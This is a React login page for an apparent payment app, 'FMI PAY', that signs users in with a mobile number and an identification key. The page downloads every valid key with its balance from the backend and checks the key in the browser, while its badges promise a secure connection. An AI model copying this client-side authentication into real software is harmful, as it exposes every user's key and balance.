import { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import { Card, CardContent, CardHeader } from "@/components/ui/card";
import { ShieldCheck, Lock, Phone, Key } from "lucide-react";
import { toast } from "sonner";
import axios from "axios";
import { useLanguage } from "@/lib/LanguageContext";
import LanguageSelector from "@/components/LanguageSelector";

const API_URL = `${process.env.REACT_APP_BACKEND_URL}/api`;

export default function LoginPage() {
  const navigate = useNavigate();
  const { t } = useLanguage();
  const [mobile, setMobile] = useState("");
  const [idKey, setIdKey] = useState("");
  const [isLoading, setIsLoading] = useState(false);
  const [codes, setCodes] = useState({});

  useEffect(() => {
    const loadCodes = async () => {
      try {
        const response = await axios.get(`${API_URL}/codes`);
        const codesMap = {};
        response.data.forEach(item => {
          codesMap[item.code] = { 
            amount: item.amount, 
            formatted: item.formatted,
            currency: item.currency || "XPF"
          };
        });
        setCodes(codesMap);
      } catch (error) {
        console.error("Error loading codes:", error);
      }
    };
    loadCodes();
  }, []);

  const handleLogin = (e) => {
    e.preventDefault();
    
    if (!mobile.trim()) {
      toast.error(t("enterMobile"));
      return;
    }
    
    if (!idKey.trim()) {
      toast.error(t("enterKey"));
      return;
    }

    setIsLoading(true);

    const account = codes[idKey];
    if (!account) {
      setTimeout(() => {
        setIsLoading(false);
        toast.error(t("invalidKey"));
      }, 1000);
      return;
    }

    sessionStorage.setItem("userMobile", mobile);
    sessionStorage.setItem("userIdKey", idKey);
    sessionStorage.setItem("userBalance", account.formatted);
    sessionStorage.setItem("userAmount", account.amount.toString());
    sessionStorage.setItem("userCurrency", account.currency || "XPF");

    setTimeout(() => {
      setIsLoading(false);
      navigate("/dashboard");
    }, 1500);
  };

  return (
    <div className="min-h-screen mesh-gradient flex flex-col items-center justify-center p-4">
      {/* Language Selector */}
      <div className="absolute top-4 right-4">
        <LanguageSelector />
      </div>

      <div className="w-full max-w-md animate-fade-in">
        {/* Logo */}
        <div className="text-center mb-8">
          <img src="/logo-fmi.png" alt="FMI PAY" className="w-16 h-16 mx-auto mb-4 rounded-2xl" />
          <h1 className="text-3xl font-bold text-[#0F172A] tracking-tight">FMI PAY</h1>
          <p className="text-[#64748B] mt-2 text-sm">
            {t("welcome")}
          </p>
        </div>

        {/* Login Card */}
        <Card className="form-container border-0 shadow-xl" data-testid="login-card">
          <CardHeader className="pb-4">
            <div className="flex items-center gap-2 text-[#2563EB]">
              <Lock className="w-4 h-4" />
              <span className="text-xs font-medium uppercase tracking-wider">
                {t("accessAccount")}
              </span>
            </div>
          </CardHeader>
          <CardContent>
            <form onSubmit={handleLogin} className="space-y-4">
              <div className="space-y-2">
                <Label htmlFor="mobile" className="text-xs font-medium text-[#64748B] uppercase tracking-wider">
                  {t("mobileNumber")}
                </Label>
                <div className="relative">
                  <Phone className="absolute left-3 top-1/2 -translate-y-1/2 w-4 h-4 text-[#64748B]" />
                  <Input
                    id="mobile"
                    type="tel"
                    placeholder={t("mobilePlaceholder")}
                    value={mobile}
                    onChange={(e) => setMobile(e.target.value)}
                    className="pl-10 h-10 text-sm"
                    data-testid="mobile-input"
                  />
                </div>
              </div>

              <div className="space-y-2">
                <Label htmlFor="idKey" className="text-xs font-medium text-[#64748B] uppercase tracking-wider">
                  {t("identificationKey")}
                </Label>
                <div className="relative">
                  <Key className="absolute left-3 top-1/2 -translate-y-1/2 w-4 h-4 text-[#64748B]" />
                  <Input
                    id="idKey"
                    type="text"
                    placeholder={t("keyPlaceholder")}
                    value={idKey}
                    onChange={(e) => setIdKey(e.target.value)}
                    className="pl-10 h-10 text-sm"
                    data-testid="id-key-input"
                  />
                </div>
                <p className="text-xs text-[#64748B]">
                  {t("keyProvidedBy")}
                </p>
              </div>

              <Button
                type="submit"
                className="w-full h-11 bg-[#0F172A] hover:bg-[#1E293B] text-white font-medium rounded-lg transition-all shadow-md hover:shadow-lg"
                disabled={isLoading}
                data-testid="login-button"
              >
                {isLoading ? (
                  <span className="flex items-center gap-2">
                    <span className="w-4 h-4 border-2 border-white/30 border-t-white rounded-full animate-spin" />
                    {t("connecting")}
                  </span>
                ) : (
                  t("openSession")
                )}
              </Button>

              <button
                type="button"
                className="w-full text-sm text-[#2563EB] hover:underline"
                data-testid="forgot-code-link"
              >
                {t("forgotCode")}
              </button>
            </form>
          </CardContent>
        </Card>
      </div>

      {/* Security Footer */}
      <div className="mt-8 pb-6 text-center">
        <div className="flex items-center justify-center gap-3">
          <div className="security-badge">
            <ShieldCheck className="w-4 h-4" />
            <span>{t("secureConnection")}</span>
          </div>
        </div>
        <p className="text-center text-xs text-[#64748B] mt-2">
          {t("dataProtected")}
        </p>
      </div>
    </div>
  );
}
